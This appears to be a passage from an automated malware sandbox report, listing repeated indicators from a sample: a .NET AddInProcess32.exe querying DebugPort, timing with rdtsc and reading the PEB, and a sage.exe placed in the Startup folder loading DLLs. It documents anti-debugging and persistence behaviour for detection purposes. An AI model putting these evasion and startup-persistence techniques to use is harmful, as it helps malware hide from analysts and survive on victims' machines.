                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess queried: DebugPort
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0155088E rdtsc 18_2_0155088E
                Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\sage.exeCode function: 14_2_0FCB19C0 LdrLoadDll,14_2_0FCB19C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154415F mov eax, dword ptr fs:[00000030h]18_2_0154415F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150A147 mov eax, dword ptr fs:[00000030h]18_2_0150A147
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150A147 mov eax, dword ptr fs:[00000030h]18_2_0150A147
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150A147 mov eax, dword ptr fs:[00000030h]18_2_0150A147
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01516179 mov eax, dword ptr fs:[00000030h]18_2_01516179
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01540118 mov eax, dword ptr fs:[00000030h]18_2_01540118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159A130 mov eax, dword ptr fs:[00000030h]18_2_0159A130
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015201C0 mov eax, dword ptr fs:[00000030h]18_2_015201C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015201C0 mov eax, dword ptr fs:[00000030h]18_2_015201C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015201F1 mov eax, dword ptr fs:[00000030h]18_2_015201F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015201F1 mov eax, dword ptr fs:[00000030h]18_2_015201F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015201F1 mov eax, dword ptr fs:[00000030h]18_2_015201F1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A1E3 mov eax, dword ptr fs:[00000030h]18_2_0151A1E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A1E3 mov eax, dword ptr fs:[00000030h]18_2_0151A1E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A1E3 mov eax, dword ptr fs:[00000030h]18_2_0151A1E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A1E3 mov eax, dword ptr fs:[00000030h]18_2_0151A1E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A1E3 mov eax, dword ptr fs:[00000030h]18_2_0151A1E3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D81EE mov eax, dword ptr fs:[00000030h]18_2_015D81EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015D81EE mov eax, dword ptr fs:[00000030h]18_2_015D81EE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015081EB mov eax, dword ptr fs:[00000030h]18_2_015081EB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01514180 mov eax, dword ptr fs:[00000030h]18_2_01514180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01514180 mov eax, dword ptr fs:[00000030h]18_2_01514180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01514180 mov eax, dword ptr fs:[00000030h]18_2_01514180
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015441BB mov ecx, dword ptr fs:[00000030h]18_2_015441BB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015441BB mov eax, dword ptr fs:[00000030h]18_2_015441BB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015441BB mov eax, dword ptr fs:[00000030h]18_2_015441BB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154E1A4 mov eax, dword ptr fs:[00000030h]18_2_0154E1A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154E1A4 mov eax, dword ptr fs:[00000030h]18_2_0154E1A4
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01540044 mov eax, dword ptr fs:[00000030h]18_2_01540044
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01596040 mov eax, dword ptr fs:[00000030h]18_2_01596040
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01516074 mov eax, dword ptr fs:[00000030h]18_2_01516074
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01516074 mov eax, dword ptr fs:[00000030h]18_2_01516074
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552010 mov ecx, dword ptr fs:[00000030h]18_2_01552010
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01518009 mov eax, dword ptr fs:[00000030h]18_2_01518009
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150C0F6 mov eax, dword ptr fs:[00000030h]18_2_0150C0F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159C0E0 mov ecx, dword ptr fs:[00000030h]18_2_0159C0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150C090 mov eax, dword ptr fs:[00000030h]18_2_0150C090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150A093 mov ecx, dword ptr fs:[00000030h]18_2_0150A093
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015A6090 mov eax, dword ptr fs:[00000030h]18_2_015A6090
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015E4080 mov eax, dword ptr fs:[00000030h]18_2_015E4080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015E4080 mov eax, dword ptr fs:[00000030h]18_2_015E4080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015E4080 mov eax, dword ptr fs:[00000030h]18_2_015E4080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015E4080 mov eax, dword ptr fs:[00000030h]18_2_015E4080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015E4080 mov eax, dword ptr fs:[00000030h]18_2_015E4080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015E4080 mov eax, dword ptr fs:[00000030h]18_2_015E4080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015E4080 mov eax, dword ptr fs:[00000030h]18_2_015E4080
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015500A5 mov eax, dword ptr fs:[00000030h]18_2_015500A5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015960A0 mov eax, dword ptr fs:[00000030h]18_2_015960A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015960A0 mov eax, dword ptr fs:[00000030h]18_2_015960A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015960A0 mov eax, dword ptr fs:[00000030h]18_2_015960A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015960A0 mov eax, dword ptr fs:[00000030h]18_2_015960A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015960A0 mov eax, dword ptr fs:[00000030h]18_2_015960A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015960A0 mov eax, dword ptr fs:[00000030h]18_2_015960A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015960A0 mov eax, dword ptr fs:[00000030h]18_2_015960A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154A350 mov eax, dword ptr fs:[00000030h]18_2_0154A350
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01508347 mov eax, dword ptr fs:[00000030h]18_2_01508347
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01508347 mov eax, dword ptr fs:[00000030h]18_2_01508347
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01508347 mov eax, dword ptr fs:[00000030h]18_2_01508347
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01590371 mov eax, dword ptr fs:[00000030h]18_2_01590371
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01590371 mov eax, dword ptr fs:[00000030h]18_2_01590371
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153237A mov eax, dword ptr fs:[00000030h]18_2_0153237A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E372 mov eax, dword ptr fs:[00000030h]18_2_0158E372
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E372 mov eax, dword ptr fs:[00000030h]18_2_0158E372
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E372 mov eax, dword ptr fs:[00000030h]18_2_0158E372
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E372 mov eax, dword ptr fs:[00000030h]18_2_0158E372
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154E363 mov eax, dword ptr fs:[00000030h]18_2_0154E363
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154E363 mov eax, dword ptr fs:[00000030h]18_2_0154E363
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154E363 mov eax, dword ptr fs:[00000030h]18_2_0154E363
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154E363 mov eax, dword ptr fs:[00000030h]18_2_0154E363
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154E363 mov eax, dword ptr fs:[00000030h]18_2_0154E363
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154E363 mov eax, dword ptr fs:[00000030h]18_2_0154E363
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154E363 mov eax, dword ptr fs:[00000030h]18_2_0154E363
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154E363 mov eax, dword ptr fs:[00000030h]18_2_0154E363
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152E310 mov eax, dword ptr fs:[00000030h]18_2_0152E310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152E310 mov eax, dword ptr fs:[00000030h]18_2_0152E310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152E310 mov eax, dword ptr fs:[00000030h]18_2_0152E310
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154631F mov eax, dword ptr fs:[00000030h]18_2_0154631F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B630E mov eax, dword ptr fs:[00000030h]18_2_015B630E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01548322 mov eax, dword ptr fs:[00000030h]18_2_01548322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01548322 mov eax, dword ptr fs:[00000030h]18_2_01548322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01548322 mov eax, dword ptr fs:[00000030h]18_2_01548322
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150E328 mov eax, dword ptr fs:[00000030h]18_2_0150E328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150E328 mov eax, dword ptr fs:[00000030h]18_2_0150E328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150E328 mov eax, dword ptr fs:[00000030h]18_2_0150E328
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015443D0 mov ecx, dword ptr fs:[00000030h]18_2_015443D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159E3DD mov eax, dword ptr fs:[00000030h]18_2_0159E3DD
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015943D5 mov eax, dword ptr fs:[00000030h]18_2_015943D5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150E3C0 mov eax, dword ptr fs:[00000030h]18_2_0150E3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150E3C0 mov eax, dword ptr fs:[00000030h]18_2_0150E3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150E3C0 mov eax, dword ptr fs:[00000030h]18_2_0150E3C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150C3C7 mov eax, dword ptr fs:[00000030h]18_2_0150C3C7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015163CB mov eax, dword ptr fs:[00000030h]18_2_015163CB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153A390 mov eax, dword ptr fs:[00000030h]18_2_0153A390
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153A390 mov eax, dword ptr fs:[00000030h]18_2_0153A390
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153A390 mov eax, dword ptr fs:[00000030h]18_2_0153A390
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B43BA mov eax, dword ptr fs:[00000030h]18_2_015B43BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015B43BA mov eax, dword ptr fs:[00000030h]18_2_015B43BA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158C3B0 mov eax, dword ptr fs:[00000030h]18_2_0158C3B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150821B mov eax, dword ptr fs:[00000030h]18_2_0150821B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150A200 mov eax, dword ptr fs:[00000030h]18_2_0150A200
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01530230 mov ecx, dword ptr fs:[00000030h]18_2_01530230
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01590227 mov eax, dword ptr fs:[00000030h]18_2_01590227
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01590227 mov eax, dword ptr fs:[00000030h]18_2_01590227
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01590227 mov eax, dword ptr fs:[00000030h]18_2_01590227
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154A22B mov eax, dword ptr fs:[00000030h]18_2_0154A22B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154A22B mov eax, dword ptr fs:[00000030h]18_2_0154A22B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154A22B mov eax, dword ptr fs:[00000030h]18_2_0154A22B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015202F9 mov eax, dword ptr fs:[00000030h]18_2_015202F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015202F9 mov eax, dword ptr fs:[00000030h]18_2_015202F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015202F9 mov eax, dword ptr fs:[00000030h]18_2_015202F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015202F9 mov eax, dword ptr fs:[00000030h]18_2_015202F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015202F9 mov eax, dword ptr fs:[00000030h]18_2_015202F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015202F9 mov eax, dword ptr fs:[00000030h]18_2_015202F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015202F9 mov eax, dword ptr fs:[00000030h]18_2_015202F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015202F9 mov eax, dword ptr fs:[00000030h]18_2_015202F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A2E0 mov eax, dword ptr fs:[00000030h]18_2_0151A2E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A2E0 mov eax, dword ptr fs:[00000030h]18_2_0151A2E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A2E0 mov eax, dword ptr fs:[00000030h]18_2_0151A2E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A2E0 mov eax, dword ptr fs:[00000030h]18_2_0151A2E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A2E0 mov eax, dword ptr fs:[00000030h]18_2_0151A2E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151A2E0 mov eax, dword ptr fs:[00000030h]18_2_0151A2E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015182E0 mov eax, dword ptr fs:[00000030h]18_2_015182E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015182E0 mov eax, dword ptr fs:[00000030h]18_2_015182E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015182E0 mov eax, dword ptr fs:[00000030h]18_2_015182E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015182E0 mov eax, dword ptr fs:[00000030h]18_2_015182E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E289 mov eax, dword ptr fs:[00000030h]18_2_0158E289
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0150C2B0 mov ecx, dword ptr fs:[00000030h]18_2_0150C2B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015342AF mov eax, dword ptr fs:[00000030h]18_2_015342AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015342AF mov eax, dword ptr fs:[00000030h]18_2_015342AF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015A6550 mov eax, dword ptr fs:[00000030h]18_2_015A6550
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015DA553 mov eax, dword ptr fs:[00000030h]18_2_015DA553
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01546540 mov eax, dword ptr fs:[00000030h]18_2_01546540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01548540 mov eax, dword ptr fs:[00000030h]18_2_01548540
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152E547 mov eax, dword ptr fs:[00000030h]18_2_0152E547
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0151254C mov eax, dword ptr fs:[00000030h]18_2_0151254C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152C560 mov eax, dword ptr fs:[00000030h]18_2_0152C560
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159C51D mov eax, dword ptr fs:[00000030h]18_2_0159C51D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01512500 mov eax, dword ptr fs:[00000030h]18_2_01512500
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153E507 mov eax, dword ptr fs:[00000030h]18_2_0153E507
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153E507 mov eax, dword ptr fs:[00000030h]18_2_0153E507
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153E507 mov eax, dword ptr fs:[00000030h]18_2_0153E507
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153E507 mov eax, dword ptr fs:[00000030h]18_2_0153E507
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153E507 mov eax, dword ptr fs:[00000030h]18_2_0153E507
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153E507 mov eax, dword ptr fs:[00000030h]18_2_0153E507
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153E507 mov eax, dword ptr fs:[00000030h]18_2_0153E507
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153E507 mov eax, dword ptr fs:[00000030h]18_2_0153E507
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154C50D mov eax, dword ptr fs:[00000030h]18_2_0154C50D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154C50D mov eax, dword ptr fs:[00000030h]18_2_0154C50D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01552539 mov eax, dword ptr fs:[00000030h]18_2_01552539
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152252B mov eax, dword ptr fs:[00000030h]18_2_0152252B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152252B mov eax, dword ptr fs:[00000030h]18_2_0152252B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152252B mov eax, dword ptr fs:[00000030h]18_2_0152252B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152252B mov eax, dword ptr fs:[00000030h]18_2_0152252B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152252B mov eax, dword ptr fs:[00000030h]18_2_0152252B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152252B mov eax, dword ptr fs:[00000030h]18_2_0152252B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0152252B mov eax, dword ptr fs:[00000030h]18_2_0152252B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015465D0 mov eax, dword ptr fs:[00000030h]18_2_015465D0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154C5C6 mov eax, dword ptr fs:[00000030h]18_2_0154C5C6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015905C6 mov eax, dword ptr fs:[00000030h]18_2_015905C6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159C5FC mov eax, dword ptr fs:[00000030h]18_2_0159C5FC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154A5E7 mov ebx, dword ptr fs:[00000030h]18_2_0154A5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154A5E7 mov eax, dword ptr fs:[00000030h]18_2_0154A5E7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_01542594 mov eax, dword ptr fs:[00000030h]18_2_01542594
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0159C592 mov eax, dword ptr fs:[00000030h]18_2_0159C592
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E588 mov eax, dword ptr fs:[00000030h]18_2_0158E588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0158E588 mov eax, dword ptr fs:[00000030h]18_2_0158E588
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154A580 mov eax, dword ptr fs:[00000030h]18_2_0154A580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0154A580 mov eax, dword ptr fs:[00000030h]18_2_0154A580
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015145B0 mov eax, dword ptr fs:[00000030h]18_2_015145B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015145B0 mov eax, dword ptr fs:[00000030h]18_2_015145B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_015985AA mov eax, dword ptr fs:[00000030h]18_2_015985AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153E45E mov eax, dword ptr fs:[00000030h]18_2_0153E45E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153E45E mov eax, dword ptr fs:[00000030h]18_2_0153E45E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153E45E mov eax, dword ptr fs:[00000030h]18_2_0153E45E
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 18_2_0153E45E mov eax, dword ptr fs:[00000030h]18_2_0153E45E
